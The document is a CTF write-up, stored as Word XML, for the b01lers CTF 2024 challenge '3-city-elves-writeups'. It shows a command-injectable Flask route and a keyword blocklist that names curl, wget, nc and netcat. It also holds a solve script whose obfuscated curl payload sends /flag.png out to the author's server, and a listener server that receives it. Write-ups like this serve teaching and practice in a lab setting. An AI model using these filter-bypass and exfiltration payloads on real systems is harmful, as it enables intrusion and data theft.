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474" w:rsidRDefault="00101474" w:rsidP="00101474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701"/>
        <w:gridCol w:w="7643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00101474" w:rsidTr="001014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74" w:rsidRDefault="00101474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101474" w:rsidRDefault="00101474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101474" w:rsidTr="001014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01474" w:rsidRDefault="00101474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101474" w:rsidTr="00101474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74" w:rsidRPr="00101474" w:rsidRDefault="00101474" w:rsidP="00101474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10147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74" w:rsidRDefault="00101474" w:rsidP="00101474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b01lers CTF 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="00101474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74" w:rsidRPr="00101474" w:rsidRDefault="00101474" w:rsidP="00101474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10147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74" w:rsidRDefault="00101474" w:rsidP="00101474">
            <w:pPr>
              <w:pStyle w:val="1"/>
              <w:framePr w:hSpace="0" w:wrap="auto" w:vAnchor="margin" w:hAnchor="text" w:xAlign="left" w:yAlign="inline"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00101474">
              <w:t>3-city-elves-writeups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="00101474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74" w:rsidRDefault="00101474" w:rsidP="0010147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74" w:rsidRDefault="00101474" w:rsidP="00101474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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidRPr="00101474" w:rsidTr="00101474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74" w:rsidRDefault="00101474" w:rsidP="0010147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74" w:rsidRPr="00101474" w:rsidRDefault="00101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474">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>https://ctftime.org/event/2250/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="001014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01474" w:rsidRDefault="00101474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101474" w:rsidRPr="00101474" w:rsidTr="001014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F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F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3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">I'm competing in a CTF so I don't have time to make my 3-city-elves challenge. How about you guys help me with the CTF I'm in by submitting some </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>writeups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">? I would really appreciate it! I only need some kind of medical hardware hacking, like insulin pump hacking. Supply chain is also acceptable. Don't try to do anything silly, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>writeup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> submission comes with a next-gen WAF. We need your help to beat Contraband Ma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nchester United and Sigma Pony!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00101474" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F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3F32">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>https://instancer.b01lersc.tf/challenge/threecityelf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="001014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01474" w:rsidRDefault="00101474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101474" w:rsidTr="001014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01474" w:rsidRDefault="00101474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DB3F32" w:rsidRPr="00DB3F32" w:rsidTr="001014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B3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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Command Injection challenge where we need to bypass a blacklisted words and leak a flag.png. To solve </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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this</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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I setup a file upload server after confirming </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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can do a curl command.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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Main challenge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1F7199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@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1F7199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app.route</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="1F7199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("/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="1F7199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pentest_submitted_flags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="1F7199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", methods=["POST"])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def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gramStart"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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submit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if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request.is_json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</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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# Retrieve JSON data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data =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request.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/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content = data[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"content"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]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if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sus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(content):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return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jsonify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"message"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"The requested URL was rejected. Please consult with your administrator."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}),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200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else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  filename =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writeup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_"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+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secrets.token</w:t>
            </w:r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_urlsafe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50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 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os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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"bash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-c \'echo \"{content}\" &gt; {filename}\'"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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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# Like I care about your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writeup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 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os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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"rm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-f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writeup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_{filename}"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return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jsonify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"message"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Writeup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submitted successfully"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}),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200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else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333333"/>
                <w:szCs w:val="18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return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jsonify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({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'error'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'Request data must be in JSON format'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}),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400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="001014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74" w:rsidRDefault="0010147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101474" w:rsidRPr="00101474" w:rsidTr="001014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F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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waf.py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def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DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs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sus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(content):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taboo = [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"bin"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"base64"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"export"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"python3"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"export"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"ruby"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perl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"x"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"/"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"("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")"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"\\"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rm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"mv"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chmod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chown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"tar"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gzip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"bzip2"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"zip"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"find"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grep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sed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awk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"cat"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"less"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"more"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"head"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"tail"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"echo"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printf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"read"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"touch"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"ln"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wget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"curl"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"fetch"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scp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rsync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sudo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ssh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nc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netcat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"ping"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"traceroute"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iptables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ufw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firewalld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crontab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"top"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htop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"du"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df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"free"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"uptime"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"kill"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killall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nohup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"jobs"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bg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fg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"watch"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wc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"sort"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uniq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"tee"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"diff"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"patch"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"mount"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umount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lsblk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blkid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fdisk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"parted"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mkfs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fsck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hdparm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lsmod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modprobe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lsusb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lspci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ifconfig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"route"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netstat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"hostname"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dnsdomainname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"date"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cal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"who"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"w"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"last"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"history"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"alias"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"export"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"source"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umask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pwd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"cd"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mkdir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rmdir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"stat"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"file"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chattr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lsof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ncdu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dmesg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journalctl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logrotate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systemctl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"service"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init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"reboot"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"shutdown"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poweroff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"halt"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systemd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"update-alternatives"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adduser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useradd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userdel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usermod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groupadd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groupdel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groupmod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passwd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chpasswd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userpasswd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su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visudo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chsh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chfn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getent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"id"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whoami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"groups"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"quota"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quotaon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quotacheck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scp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sftp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"ftp"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tftp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"telnet"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ssh-keygen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ssh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-copy-id"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ssh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-add"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ssh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-agent"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nmap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tcpdump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iftop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arp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arping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brctl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ethtool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iw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iwconfig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mtr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tracepath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fping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"hping3"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"dig"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nslookup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"host"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whois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"route"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ifconfig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iptables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firewalld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ufw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sysctl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uname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hostnamectl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timedatectl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losetup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"eject"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lvm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vgcreate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vgextend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vgreduce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vgremove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vgs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pvcreate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pvremove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pvresize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pvs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lvcreate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lvremove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lvresize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lvs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"resize2fs"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"tune2fs"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badblocks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udevadm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pgrep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pkill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"atop"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iotop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vmstat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sar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mpstat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nmon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"finger"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"ac"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journalctl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"ls"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dir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"locate"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updatedb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"which"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whereis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"cut"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"paste"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comm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xargs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gunzip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"bunzip2"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"unzip"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xz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unxz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lzma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unlzma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"7z"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ar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cpio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pax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"ftp"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sftp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"ftp"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wget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"curl"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"fetch"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rsync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scp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ssh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openssl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gpg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pgp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]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for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item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in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taboo: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if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item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in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content.lower</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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():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return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True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return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False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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We can bypass most of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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command words using this technique </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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t>c''</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB3F32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t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 and to bypass the </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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t>/</w:t>
            </w:r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 we can do </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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t>${</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB3F32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t>HOME:0:1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB3F32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t>}</w:t>
            </w:r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. https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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The command I used does a POST request to my file upload server with the /flag.png attached in the body</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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solve.py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import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os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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import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requests 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from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waf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import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sus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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# curl -F data=/flag.png &lt;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ip:port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB3F32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&gt;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payload =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"cu''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rl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-F \"data=@${</w:t>
            </w:r>
            <w:proofErr w:type="gram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HOME:0:1</w:t>
            </w:r>
            <w:proofErr w:type="gram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}flag.png\" &lt;redacted&gt;"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content = f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"""123</w:t>
            </w:r>
            <w:proofErr w:type="gram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 ;</w:t>
            </w:r>
            <w:proofErr w:type="gram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{payload} ; e''</w:t>
            </w:r>
            <w:proofErr w:type="spell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cho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"123"""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assert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not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sus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(content)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filename =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"test"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command =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"bash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-c \'echo \"{content}\" &gt; {filename}\'"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print(content)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print(command)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#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os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB3F32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(command) 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url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=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"https://threecityelf-53b6fe52e327b2cb.instancer.b01lersc.tf/pentest_submitted_flags"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json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= {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'content'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 content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r =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requests.post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url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json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=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json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333333"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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print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(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r.text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)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00101474" w:rsidRDefault="00101474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urier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00101474" w:rsidTr="001014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74" w:rsidRDefault="0010147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101474" w:rsidRPr="00101474" w:rsidTr="001014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F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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server.py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from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flask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import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Flask, request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import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os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 = Flask(__name__)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UPLOAD_FOLDER =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'uploads'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app.config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[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'UPLOAD_FOLDER'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] = UPLOAD_FOLDER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1F7199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@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1F7199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app.route</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB3F32">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="1F7199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('/', methods=["POST"])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def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b/>
                <w:bCs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xfil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try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file =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request.files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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[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'data'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]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filename =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file.filename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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file.save</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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os.path.join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app.config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[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'UPLOAD_FOLDER'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], filename))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except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Exception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as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e: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return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str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(e)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return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'Success'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if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__name__ == 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'__main__'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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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proofErr w:type="spellStart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app.run</w:t>
            </w:r>
            <w:proofErr w:type="spell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(host=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'0.0.0.0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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,port</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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=</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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8901</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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To view the flag, I just opened the uploaded file under </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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t>/uploads</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3F32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 on the listener server</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32">
            <w:pPr>
              <w:spacing w:after="135" w:line="270" w:lineRule="atLeast"/>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t>flag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t>: bctf{Lucky_you_I_did_not_code_this_stuff_in_Ruby_lasudkjklhdsfkhjkae}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB3F32" w:rsidRPr="00DB3F32" w:rsidRDefault="00DB3F32" w:rsidP="00DB3F32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hyperlink r:id="rId5" w:anchor="web3-city-elves-writeups" w:tgtFrame="_new" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a6"/>
                  <w:color w:val="0088CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Original writeup</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FCFCFC"/>
              </w:rPr>
              <w:t> (https://xeunwa.github.io/b01lers-2024/#web3-city-elves-writeups).</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w:rsidR="00101474" w:rsidRDefault="00DB3F32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DB3F32"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  <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5745480" cy="8437638"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
                  <wp:docPr id="2" name="Рисунок 2" descr="fla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la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431" cy="845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1474" w:rsidRDefault="00101474" w:rsidP="00101474">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00101474" w:rsidRDefault="00101474" w:rsidP="00101474">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00101474" w:rsidRDefault="00101474" w:rsidP="00101474">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00101474" w:rsidRDefault="00101474" w:rsidP="00101474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80B25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F3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474"/>
    <w:rsid w:val="00101474"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="00B915B7"/>
    <w:rsid w:val="00DB3F3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22124"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CC56FBE-AFC8-4DC8-A44C-86D686FF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101474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101474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4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4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474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0147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101474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1474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101474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10147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4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB3F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ljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB3F32"/>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DB3F32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB3F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xeunwa.github.io/b01lers-202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2024-06-27T15:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T15:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>